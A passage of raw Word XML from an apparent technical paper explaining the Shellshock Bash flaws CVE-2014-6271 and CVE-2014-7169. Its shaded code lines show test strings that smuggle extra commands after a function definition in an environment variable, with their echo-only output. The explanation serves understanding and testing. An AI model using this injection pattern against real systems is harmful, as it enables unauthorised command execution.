          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tal variables and functions the same way. The manner for Bash to distinguish whether an environmental variable is a function is just to check the beginning of the variable. If it started with </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</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the environmental variable would be considered as a function by Bash. With this knowledge in mind, those hackers who are familiar with Bash forged command like </w:t>
      </w:r>
      <w:r w:rsidR="000F104A" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="000F104A" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>13]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$export test1=‘() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “inside test1” ;}; echo “outside test1”;’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00703AA9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>heck the environmental variables</w:t>
      </w:r>
      <w:r w:rsidR="00095ECC">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> now:</w:t>
      </w:r>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>test1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) { echo “inside test1” ;}; echo “outside test1”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearly what has been exported is already in the environmental variable list. However, a closer look at this carefully designed function will reveal its trick. During the process of exporting environmental function </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>test</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everything included in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">single </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quotation marks is considered as part of the definition of the fun</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tion. However, single quotation marks are not part of the function and will not show up in the function that is listed in the environmental variable list. The function actually ended at the right curly bracket. Any commands after the semicolon become independent and will be executed when a subshell is spawned and the environmental variables are duplicated. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outside</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> test1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Moreover, a more serious situation has been found that another command could be piggy-backed outside of the single quotation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>marks which does</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> not require child process spawning to run. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> test2=‘() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “inside test2” ;};’ echo “outside test</w:t>
      </w:r>
      <w:r w:rsidR="00C04768" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outside</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r w:rsidR="00666194">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the same principles combined with Bash grammars, a more complicated test script could be </w:t>
      </w:r>
      <w:r w:rsidR="007C7E19" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fabr</w:t>
      </w:r>
      <w:r w:rsidR="007C7E19" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="007C7E19" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cated</w:t>
      </w:r>
      <w:r w:rsidR="007C7E19" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>7]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VAR=‘() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;}; echo Bash is vulnerable!’ bash -c “echo Bash Test”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bash is vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00814212">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bash Test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>It can be seen that with this script, both the commands in and out of the single quotation marks are ex</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cuted. The colon in the curly brackets is equivalent to the command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/bin/true</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which simply returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</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value and exit. The following </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash -c</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command means spawning a child subshell and executing what is behind. The bug explained above is an example of the Shellshock Bash vulnerability CVE-2014-6271. To summarize, current Bash versions allow exporting environment variable functions which are d</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fined starting with </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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in the variable value. However, Bash does not stop after processing the function definition and continues to parse and execute commands following the function definition. Thus, this fe</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ture engenders the vulnerability that illegal commands could be appended after the environmental vari</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ble function and executed without permission requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Soon after the report of CVE-2014-6271, another major vulnerability CVE-2014-7169 was pu</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lished and the test method was provided. This more serious bug differs from the first one by the feature of including the invoking of Bash interpreter exception and the ability to directly write files into the system. The published testing method is presented below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> X=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>‘ (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
